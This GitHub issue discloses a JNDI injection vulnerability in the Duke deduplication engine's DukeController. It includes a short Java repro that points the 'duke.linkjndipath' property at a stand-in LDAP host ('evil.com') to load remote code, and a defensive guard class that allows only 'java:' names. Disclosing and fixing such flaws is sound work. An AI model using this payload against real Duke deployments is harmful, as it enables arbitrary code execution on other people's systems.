larsga / Duke

Duke is a fast and flexible deduplication engine written in Java
Apache License 2.0

There's a code injection vulnerability in `no.priv.garshol.duke.server.DukeController.<constructor>(Properties)` #274

Open LetianYuan opened 1 year ago

LetianYuan commented 1 year ago

Affected Version
The latest version 1.2 and below.

Describe the vulnerability
There is a method no.priv.garshol.duke.server.DukeController.<constructor>(Properties). If the Properties parameter contains a property ("duke.linkjndipath", "ldap://example.com/Evil"), attackers might execute arbitrary commands through ctx.lookup("ldap://example.com/Evil"). For instance, the following code will lead to the execution of arbitrary code from attackers:

```java
import java.util.Properties;
import no.priv.garshol.duke.server.DukeController;

public class Repro {
    public static void main(String[] args) {
        Properties properties = new Properties();
        properties.setProperty("duke.configfile", "src/main/resources/duke.xml");
        properties.setProperty("duke.linkdbtype", "jndi");
        // Attacker-controlled JNDI name: resolved via ctx.lookup() inside the constructor
        properties.setProperty("duke.linkjndipath", "ldap://evil.com:12345");
        properties.setProperty("duke.database", "mysql");
        DukeController controller = new DukeController(properties);
    }
}
```

To Reproduce
Build an LDAP server and provide malicious code. Then just executing the above code would reproduce it.

Fix Suggestion
Filter LDAP, RMI and related protocols when using lookup.
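One way to implement the suggested fix, as an added example that is not Duke's own code: a guard that rejects any JNDI name whose URL scheme is not the in-process `java:` namespace before the value is handed to `InitialContext.lookup()`. `InitialContext` treats a name with a leading scheme (`ldap:`, `rmi:`, ...) as a URL name and dispatches it to that scheme's context factory, which is how a configured `ldap://` value reaches a remote server; restricting the scheme to `java` closes that path. The class name `JndiNameGuard`, its methods, the `java:`-only allowlist and the sample values are assumptions made here; the only identifier taken from the report is the `duke.linkjndipath` property.

```java
import java.util.Locale;
import java.util.Properties;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * Hypothetical helper (not part of Duke): validates a JNDI name read from
 * configuration before it is passed to InitialContext.lookup().
 * Only names inside the local "java:" namespace are accepted; every
 * URL-style name with another scheme (ldap, ldaps, rmi, iiop, dns, ...)
 * and every plain name without a scheme is rejected, i.e. the check fails closed.
 */
public final class JndiNameGuard {
    // RFC 3986 scheme grammar: ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ), anchored at start
    private static final Pattern SCHEME = Pattern.compile("^([A-Za-z][A-Za-z0-9+.-]*):");

    private JndiNameGuard() {}

    /** Returns the lower-cased scheme of a URL-style JNDI name, or null for a plain name. */
    static String schemeOf(String name) {
        Matcher m = SCHEME.matcher(name);
        return m.find() ? m.group(1).toLowerCase(Locale.ROOT) : null;
    }

    /** True only for names in the in-process "java:" namespace, e.g. java:comp/env/jdbc/linkdb. */
    public static boolean isLocalJavaName(String name) {
        if (name == null || name.isBlank()) {
            return false;
        }
        // Plain names (no scheme) are also rejected: their resolution depends on the
        // ambient initial-context factory, which this guard cannot vouch for.
        return "java".equals(schemeOf(name));
    }

    /** Reads a JNDI path property (assumed key, e.g. "duke.linkjndipath") and fails closed. */
    public static String requireLocalJndiPath(Properties props, String key) {
        String path = props.getProperty(key);
        if (!isLocalJavaName(path)) {
            throw new IllegalArgumentException(
                key + " must name an entry in the java: namespace, got: " + path);
        }
        return path;
    }

    public static void main(String[] args) {
        // Constructed sample values: the remote name from the report, an RMI variant,
        // a mixed-case scheme, and a local container-managed name.
        String[] samples = {
            "ldap://example.com/Evil",
            "rmi://example.com/Evil",
            "LDAP://example.com/Evil",
            "java:comp/env/jdbc/linkdb"
        };
        for (String s : samples) {
            System.out.println(s + " -> " + (isLocalJavaName(s) ? "accepted" : "rejected"));
        }

        Properties props = new Properties();
        props.setProperty("duke.linkjndipath", "java:comp/env/jdbc/linkdb");
        // Call this before constructing the controller; a remote name throws here
        // instead of reaching ctx.lookup().
        System.out.println("validated: " + requireLocalJndiPath(props, "duke.linkjndipath"));
    }
}
```

The scheme is matched with an anchored regular expression rather than `String.startsWith("ldap")` so that case variants and other remote schemes are caught by the same rule, and the allowlist is positive (`java` only) rather than a denylist of known-bad protocols, so a scheme the author did not think of is still rejected.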